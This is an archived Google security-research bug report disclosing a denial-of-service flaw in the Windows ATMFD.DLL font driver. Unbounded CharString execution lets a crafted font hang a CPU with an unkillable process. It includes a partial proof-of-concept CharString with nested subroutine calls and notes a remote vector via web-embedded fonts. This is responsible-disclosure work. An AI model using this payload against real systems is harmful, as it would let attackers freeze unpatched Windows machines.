raghavmishra / google-security-research

Automatically exported from code.google.com/p/google-security-research
0 stars 0 forks source link

Windows Kernel ATMFD.DLL DoS via unlimited CharString program execution #169

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago
The Adobe Type Manager Font Driver (ATMFD.DLL) used by the Windows kernel to 
handle Type1 (.PFB + .PFM) and OpenType (.OTF) fonts does not limit the number 
of state machine instructions which can be executed per glyph, while e.g. 
FreeType set the maximum to 20'000'000.

By using multiple nested calls of subroutines and computationally expensive 
operations (such as drawing outlines), it is possible to cause ATMFD.DLL to get 
stuck in the main VM execution loop forever, thus consuming 100% of a single 
CPU (can be scaled to attack multiple CPUs) and implicitly creating an 
unkillable process.

The issue is reproducible with both Type-1 and OTF fonts on all Microsoft 
Windows editions (up to 8.1), regardless of bitness. The most obvious attack 
scenario would be to conduct the attack locally, but since CSS allows arbitrary 
OTF fonts to be embedded in websites, this can be potentially exploited in a 
remote manner in the context of browsers which use GDI for font rasterization. 
Other remote vectors (e.g. through PDF / Office documents) might also be 
viable, but have not been investigated.

The following CharString code causes 65536 drawing operations to be performed, 
which is sufficient to demonstrate the attack on any modern machine:

          <CharString index="40">
            -100 0 rmoveto 100 100 rlineto 0 -100 rlineto return
          </CharString>
          <CharString index="41">
            -67 callsubr -67 callsubr -67 callsubr -67 callsubr
            -67 callsubr -67 callsubr -67 callsubr -67 callsubr
            -67 callsubr -67 callsubr -67 callsubr -67 callsubr
            -67 callsubr -67 callsubr -67 callsubr -67 callsubr
            return
          </CharString>
          <CharString index="42">
            -66 callsubr -66 callsubr -66 callsubr -66 callsubr
            -66 callsubr -66 callsubr -66 callsubr -66 callsubr
            -66 callsubr -66 callsubr -66 callsubr -66 callsubr
            -66 callsubr -66 callsubr -66 callsubr -66 callsubr
            return
          </CharString>
          <CharString index="43">
            -65 callsubr -65 callsubr -65 callsubr -65 callsubr
            -65 callsubr -65 callsubr -65 callsubr -65 callsubr
            -65 callsubr -65 callsubr -65 callsubr -65 callsubr
            -65 callsubr -65 callsubr -65 callsubr -65 callsubr
            return
          </CharString>
          <CharString index="44">
            -64 callsubr -64 callsubr -64 callsubr -64 callsubr
            -64 callsubr -64 callsubr -64 callsubr -64 callsubr
            -64 callsubr -64 callsubr -64 callsubr -64 callsubr
            -64 callsubr -64 callsubr -64 callsubr -64 callsubr
            return
          </CharString>
[...]
        <CharString name="A">
          100 0 rmoveto -63 callsubr endchar
        </CharString>

Attached are the following POC files:

1) The source code of an OTF file (poc.ttx) and the resulting font (poc.otf) 
compiled with the "ttx" utility, a part of an open-source "fonttools" project 
(https://github.com/behdad/fonttools/).

2) The source code of a Type-1 font (poc.pfa) and the resulting font (poc.pfb, 
poc.pfm) compiled with the "type1" utility, a part of the "Adobe Font 
Development Kit for OpenType" software package 
(http://www.adobe.com/devnet/opentype/afdko/topic_overview.html).

Original issue reported on code.google.com by mjurc...@google.com on 14 Nov 2014 at 1:49

Attachments:

GoogleCodeExporter commented 9 years ago

Original comment by mjurc...@google.com on 14 Nov 2014 at 2:01

GoogleCodeExporter commented 9 years ago
This bug is subject to a 90 day disclosure deadline. If 90 days elapse without 
a broadly available patch, then the bug report will automatically become 
visible to the public.

Original comment by mjurc...@google.com on 18 Nov 2014 at 11:44

GoogleCodeExporter commented 9 years ago

Original comment by mjurc...@google.com on 4 Dec 2014 at 4:37

GoogleCodeExporter commented 9 years ago

Original comment by mjurc...@google.com on 11 Dec 2014 at 10:16

GoogleCodeExporter commented 9 years ago

Original comment by mjurc...@google.com on 24 Mar 2015 at 10:06

GoogleCodeExporter commented 9 years ago

Original comment by cev...@google.com on 1 Apr 2015 at 12:11

GoogleCodeExporter commented 9 years ago

Original comment by mjurc...@google.com on 20 Apr 2015 at 2:07

GoogleCodeExporter commented 9 years ago

Original comment by mjurc...@google.com on 12 Jun 2015 at 4:02